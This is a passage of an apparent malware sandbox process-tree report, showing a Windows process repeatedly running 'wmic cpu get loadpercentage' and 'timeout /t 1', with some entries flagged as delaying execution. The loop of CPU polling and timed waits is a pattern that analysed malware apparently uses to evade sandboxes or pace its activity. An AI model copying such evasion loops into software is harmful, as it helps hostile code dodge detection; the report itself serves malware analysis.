- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3904
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2008
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:540
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1116
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1812
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1176
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1948
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4936
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1128
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4216
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1468
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1748
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:492
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2324
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:908
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3140
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2188
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5052
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4588
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4824
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2320
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3544
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3548
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3740
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3408
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5040
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3240
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4400
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2372
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3376
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4076
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2192
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3512
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1952
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3620
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4420
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2328
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:748
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3676
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4932
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:72
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2716
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2760
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1144
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:224
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5060
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:336
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4928
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3148
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4176
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2512
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3636
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1744
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4472
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2296
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1764
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2144
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4992
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1968
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3556
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1468
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5008
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1564
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2248
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4240
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5032
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3736
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2932
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4208
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4956
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1188
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2868
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4392
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4540
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1488
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1244
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3728
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3268
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3512
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4832
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4636
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2384
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3760
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3644
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3928
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4476
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1976
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1528
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2412
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4132
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2472
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4628
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4820
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4720
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1776
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4412
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1896
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2068
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:540
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3380
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3980
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4748
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3756
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3888
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4320
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1124
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2844
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4952
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4592
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2396
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4640
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4944
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2280
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4752
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:908
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1064
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1904
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2804
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3788
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:928
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4804
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1960
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3848
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3612
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3696
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4248
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3720
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3932
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4312
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1892
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1372
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3988
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4124
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2416
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2272
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2316
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2328
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2572
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:748
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2924
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1324
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3676
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3876
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3352
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4464
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1104
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:560
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3320
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3104
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1572
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2512
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2812
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4324
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:644
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3096
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4568
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2972
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1052
